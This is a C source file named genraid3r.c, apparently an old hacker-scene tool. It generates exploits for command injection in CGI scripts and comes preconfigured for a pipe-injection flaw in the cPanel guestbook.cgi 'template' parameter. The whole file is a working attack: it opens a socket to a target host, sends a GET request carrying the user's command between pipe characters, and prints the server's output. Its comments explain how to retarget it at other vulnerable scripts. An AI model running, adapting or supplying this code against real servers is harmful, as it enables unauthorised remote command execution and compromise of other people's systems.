/* Begin genraid3r.c           */
/* By J0hny_Lightning          */
/* j0hnylightning@hotmail.com  */
/*
** genraid3r.c is a cgi exploit generator for
** lazy hax0rs who don't want to use the web
** browser to do their stuff. All u need to do
** is modify some of the strings and compile
** to get an exploit for whatever cgi vuln.
** It will execute your command on the web
** server and print the output to stdout.
** Tested on FreeBSD 4.6.
**
** The strings you will need to change are:
** 1) PATH        This is the path to the vulnerable
**                script. (ie: "/cgi-bin/forum/postit.cgi" )
**
** 2) PART_ONE    This is a string that is the first series
**                of arguements to the vulnerable script
**                before the command is executed. For example
**                if your are exploiting the cpanel
**                guestbook.cgi you should set part_one to:
**                "?user=cpanel&template=|"
**
** 3) PART_TWO    This is a string that is the last series of
**                arguements to be passed to the script after
**                the command to be executed. Sticking with
**                our example, part_two should be set to "|"
**
** Compile using: gcc genraid3r.c -o genraid3r
** Usage: ./genraid3r <hostname> <command>
**
** Note: When you specify <command> if it has a space
** make sure to specify the unicode representation
** of the space character. (ie: ls -al should be ls%20-al)
**
*/

/* Includes  */

#include <stdio.h>                   //  Standard includes for i/o,
#include <errno.h>                   //  error reporting, and string
#include <string.h>                  //  functions.
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>               //  Standard includes for
#include <sys/socket.h>              //  networking functions.
#include <netinet/in.h>
#include <arpa/inet.h>

/* oO0OooO0OooO0Oo Change these defines! oO0OooO0OooO0Oo */

#define PATH "/cgi-sys/guestbook.cgi"       /* Path to the script */
#define PART_ONE "?user=cpanel&template=|"  /* First set of args  */
#define PART_TWO "|"                        /* 2nd set of args    */

/* Changing anything below this line voids the warranty  */

#define DEST_PORT 80
#define MAXBUF    1024

int main(int argc, char *argv[]){
  int sizock, own3d;
  struct hostent *toBeOwned;
  struct sockaddr_in addy;
  char bizuffer[MAXBUF];

  if (argc != 3){
    fprintf(stderr, "Usage: %s <host name> <command> \n", argv[0]);
    exit(1);
  }

  if ((toBeOwned=(struct hostent *)gethostbyname(argv[1])) == NULL  ){
    herror("gethostbyname()");
    exit(1);
  }

  if ((sizock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){
    perror("socket()");
    exit(1);
  }

  addy.sin_family = AF_INET;
  addy.sin_port = htons(DEST_PORT);
  bcopy(toBeOwned->h_addr, (char *)&addy.sin_addr, toBeOwned->h_length );
  memset(&(addy.sin_zero), '\0', 8);

  if ((connect(sizock, (struct sockaddr*)&addy, sizeof(addy))) < 0){
    perror("connect()");
    exit(1);
  }

  fprintf(stdout,"Hey! Hey! Time for 0day...\n\n");
  sprintf(bizuffer, "GET %s%s%s%s \n\n",  PATH, PART_ONE, argv[2], 
PART_TWO);

  send(sizock, bizuffer, strlen(bizuffer), 0);

  fflush(stdout);


  do
  {
    bzero(bizuffer, sizeof(bizuffer));
    own3d = recv(sizock, bizuffer, sizeof(bizuffer), 0);
    if (own3d > 0)
      fprintf(stdout, "%s", bizuffer);
  }
  while (own3d > 0);

  close(sizock);
  return 0;
}

/* End genraid3r.c  */